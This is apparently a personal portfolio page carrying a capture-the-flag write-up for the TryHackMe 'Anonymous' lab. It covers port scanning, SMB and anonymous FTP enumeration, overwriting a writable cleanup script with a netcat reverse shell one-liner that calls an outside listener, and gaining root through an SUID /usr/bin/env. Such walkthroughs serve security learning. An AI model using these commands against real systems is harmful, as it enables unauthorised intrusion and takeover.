A step-by-step walkthrough of the TryHackMe Anonymous machine

Network Enumeration

Comprehensive port scanning and service identification using Nmap with advanced scripting techniques.

Nmap Masscan

SMB Analysis

Identifying and enumerating SMB shares, understanding share permissions, and extracting valuable information.

SMBClient Enum4Linux SMBMap

FTP Exploitation

Leveraging anonymous FTP access to discover and analyze file structures, scripts, and logs.

FTP Telnet Netcat

Bash Scripting

Analyzing and modifying shell scripts to create reverse shell payloads for initial access.

Bash Kali Linux

Privilege Escalation

Identifying SUID misconfigurations and exploiting environmental variables for root access.

SUIDEnum LinPEAS LinEnum

Tool Proficiency

Effective use of SMBClient, FTP, netcat, and enumeration scripts to systematically compromise the system.

Linux Kali Linux Bash

Anonymous TryHackMe Writeup

nmap -A -T4 -p- 10.10.153.251 -oA anonymous Starting Nmap 7.93 ( https://nmap.org ) at 2023–02–06 08:29 EST Warning: 10.10.153.251 giving up on port because retransmission cap hit (6). Nmap scan report for 10.10.153.251 Host is up (0.19s latency). Not shown: 65501 closed tcp ports (conn-refused), 30 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.23.51 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 — secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8bca21621c2b23fa6bc61fa813fe1c68 (RSA) | 256 9589a412e2e6ab905d4519ff415f74ce (ECDSA) |_ 256 e12a96a4ea8f688fcc74b8f0287270cd (ED25519) 139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 6s, deviation: 1s, median: 5s |_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: , NetBIOS MAC: 000000000000 (Xerox) | smb2-time: | date: 2023–02–06T13:43:53 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 311: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: anonymous | NetBIOS computer name: ANONYMOUS\x00 | Domain name: \x00 | FQDN: anonymous |_ System time: 2023–02–06T13:43:53+00:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 854.27 seconds

SMB Enumeration (Port 139/445)

My tool of choice for share enumeration is SMBClient:

[-(kali@kali)-[-/TryHackMe/Machines/Linux/Anonymous] $ smbclient -l 10.10.153.251 Password for [WORKGROUP\kali]:
Sharename Type Comment
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
Workgroup Master
WORKGROUP ANONYMOUS

The pics share is the only share that does not require authentication. As denoted by the use of ($) the IPC$ and the print$ require authentication.

Pics Share Enumeration

smb: \> ls . D 0 Sun May 17 07:11:34 2020 .. D 0 Wed May 13 21:59:10 2020 corgo2.jpg N 42663 Mon May 11 20:43:42 2020 puppos.jpeg N 265188 Mon May 11 20:43:42 2020 20508240 blocks of size 1024. 13306792 blocks available
smb: \> mget * Get file corgo2.jpg? yes getting file \corgo2.jpg of size 42663 as corgo2.jpg (35.7 KiloBytes/sec) (average 35.7 KiloBytes/sec) Get file puppos.jpeg? yes getting file \puppos.jpeg of size 265188 as puppos.jpeg (86.8 KiloBytes/sec) (average 72.4 KiloBytes/sec)

It shows the presence of two images. Nothing much to go on.

FTP Enumeration

ftp> ls 229 Entering Extended Passive Mode (|||58890|) 150 Here comes the directory listing. drwxrwxrwx 2 1110 113 4096 Jun 04 2020 scripts 226 Directory send OK.
ftp> cd scripts 250 Directory successfully changed.
ftp> ls 229 Entering Extended Passive Mode (|||119163|) 150 Here comes the directory listing. -rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh -rw-rw-r-- 1 1000 1000 5074 Feb 06 13:51 removed_files.log -rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt 226 Directory send OK.

According to the name of the machine, it is a hint that anonymous login is allowed in FTP.

Download all the FTP Files

#!/bin/bash tmp_files=0 echo $tmp_files if [ $tmp_files=0 ] then echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log else for LINE in $tmp_files; do rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log; done fi

The bash script called clean.sh is used to run a cleanup script to delete files from the /tmp folder. Then save the date and details of the deleted file to the ftp log.

Privilege Escalation

Edit the Bash Script and replace it with a bash reverse script

#!/bin/bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 2500 >/tmp/f

Replace the IP with your IP and listening port.

SUID Enumeration

namelessone@anonymous:~$ find / -uid 0 -perm -4000 -type f 2>/dev/null /usr/bin/env ...

The SUID (/usr/bin/env) is vulnerable. The suggestion is consistent with GTFOBins for privilege escalation.

ENV Privilege Escalation

namelessone@anonymous:~$ /usr/bin/env /bin/bash -p bash-4.4# id uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
bash-4.4# whoami root

The root user is achieved via SUID Exploitation.

Contact Information

Email

andrewkorir08@gmail.com

LinkedIn

Andrew Keitany

Phone

+254707981971

Medium

Anonymous WriteUp